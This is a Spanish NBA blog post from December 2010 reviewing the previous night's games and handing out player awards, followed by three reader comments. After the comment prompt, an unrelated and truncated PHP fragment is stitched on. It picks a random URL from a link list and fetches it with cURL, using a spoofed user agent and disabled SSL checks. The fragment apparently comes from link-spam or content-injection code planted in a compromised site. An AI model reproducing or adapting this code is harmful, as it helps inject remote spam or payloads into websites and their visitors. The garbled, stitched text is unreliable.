La Crónica (28/12/2010): No volvía MJ, claro

29 de December de 2010 por TheDeerHunter

Jordan no tiene pensado volver, al menos que nosotros sepamos. Pero seguro que tampoco lo veíais tan descabellado y es que si bajó de los despachos una vez para poner orden, ¿porqué no podría hacerlo de nuevo? Si alguno ya corría al NBA Store para reservar el 23 de los Bobcats con el nombre de Jordan, lo sentimos mucho.

Así que vamos con lo que sí es una realidad. Anoche presenciamos una jornada de nivel en la que todos los gallos de la competición saltaban al ruedo.

El partido más interesante a priori no lo fue tanto. Los Lakers rozaron el ridículo en San Antonio con un rendimiento ofensivo nefasto y una defensa con los puntos débiles habituales (82-97). Parker y George Hill causaron demasiado daño y, en un mal partido de Duncan, Blair arrasó la zona angelina casi sin oposición. 3 derrotas consecutivas para los campeones otra vez este curso. Deberían empezar a estar preocupados si no lo estaban ya. Lo malo es que su división es un solar y no hay nadie que les apriete las clavijas.

Sin embargo sí pudimos disfrutar de un partidazo en Miami. No cabe duda de que los Knicks de este año son atractivos de ver y se lo pusieron francamente difícil a los locales (98-106). Stat hizo mucho daño por dentro y sólo 40 puntazos de Wade y un gran partido de Ilgauskas cuando menos nos lo esperábamos logró desequilibrar la balanza. LeBron rozó otro triple doble, por cierto…

Los Magic ganaron en Cleveland liderados por sus tres nuevos fichajes (110-95). Inmenso partido de Arenas desde el banco, Jason Richardson muy fino en el tiro, Turkoglu muy completo y por si faltaba algo Earl Clark aprovechando sus minutos. La lástima es que Howard se diluya porque este equipo llegará fundamentalmente a donde llegue él. Que nadie se confunda.

Los Celtics aguantan el paso de San Antonio y ganaron bastante cómodos en Indiana (95-83). Pierce y Allen lideraron al equipo en un partido oscuro de Garnett. Desde el banco una muy buena contribución de Glen Davis y, sobre todo, de Marquis Daniels. Qué importante sería para los verdes recuperarle para la causa.

No sabría decir cual es la mejor noticia para Chicago. Su posición en la tabla, la irrupción de Boozer, la manera de mantener los resultados aún sin Noah (anoche le dieron un buen baño a los Bucks, 77-90) o… el rumor de que podrían incorporar a OJ Mayo. De momento es sólo un rumor. Pero podría ser la guinda de este proyecto y uno de los bombazos antes del límite de traspasos.

La jornada fue pésima para Dallas, que cayeron en casa contra Toronto notando excesivamente la ausencia de Nowitzki (84-76). Calderon también estaba lesionado anoche… pero esto no impidió de Ed Davis y DeRozan se la armaran a Carlisle anoche.

Por último los Nuggets recuperarán a Melo para el próximo partido (si no lo traspasan antes) habiendo reencontrado a Billups precisamente en su ausencia. Anoche palizón a unos Blazers en cuadro (77-95).

PREMIOS

MVP: Fue el día de Dwyane Wade. 40 puntos, 9 rebotes y victoria la saca.

Rookie: Recuperado de la lesión que sufrió a principios de temporada y aprovechando las ausencias de Bargnani y Evans, Ed Davis da muestras de su calidad con sus 17 puntos, 12 rebotes, 3 robos y 3 tapones contra Dallas.

Sorpresa: Cuidadín que Gilbert Arenas empieza  carburar y cómo ya apuntamos hace tiempo, él puede marcar buena parte del éxito de estos Magic. Desde el banco, ayer aportó 22 puntos y 11 asistencias.

Decepción: Que el mejor jugador de los Lakers anoche fuera un Pau Gasol que no pasó de los 10 puntos dice muchas cosas. 8 de 27 para Kobe…

Esfuerzo en vano: En ausencia de Brandon Roy, Lamarcus Aldridge se ha erigido en líder de los Blazers. Anoche consiguió 18 puntos, 13 rebotes, 4 asistencias y 7 tapones pero estuvbo demasiado solo.

Comenta

3 comentarios a esta entrada

  1. -=TheKing=- dice:
    #1

    Duncan parece que pasa de todo, pero supongo que en los play-off se pondrá a toda máquina y jodera a quién se cruce con ellos.
    Me gustaría destacar la actuación de Bonner, para mí un asesino silencioso, estadísticas disimuladas pero en momentos clave del partido.

      Citar

  2. xapa_croack dice:
    #2

    en los ultimos partidos clippers 9-9, lakers8-8, tampoco estamos tan mal, no?

      Citar

  3. nacho dice:
    #3

    Estos Lakers no es que parezcan cansados, es que están aburridos. No se de qué, pero aburridos, indolentes… mala pinta tienen.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>